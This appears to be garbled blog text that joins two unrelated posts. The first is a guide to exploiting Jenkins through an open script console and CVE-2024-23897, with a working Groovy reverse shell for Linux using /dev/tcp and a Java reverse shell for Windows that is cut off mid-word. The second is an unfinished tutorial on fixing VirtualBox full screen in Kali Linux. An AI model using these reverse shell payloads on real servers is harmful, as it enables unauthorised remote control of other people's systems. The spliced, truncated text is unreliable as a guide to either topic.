Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
You may tried all methods to make your Linux VM in Virtual Box full screen but nothing worked.Right?
I also encountered the same issue, so here is the solution that worked for me.
I was using Kali Linux and by default the guest additions comes preinstalled but that didn't solve my problem. I was not getting the window full screen.
The below screenshot is before solving the issue. I tried to install the guest additions manually and noticed that the OS was unable to find the kernel headers.
Try the following steps to fix.
1) Update the modules and packages.
sudo apt update -y && apt upgrade -y && apt dist-upgrade
2) Install the headers.
sudo apt install linux-headers-$(uname -r)
3) Now install the guest additions tool.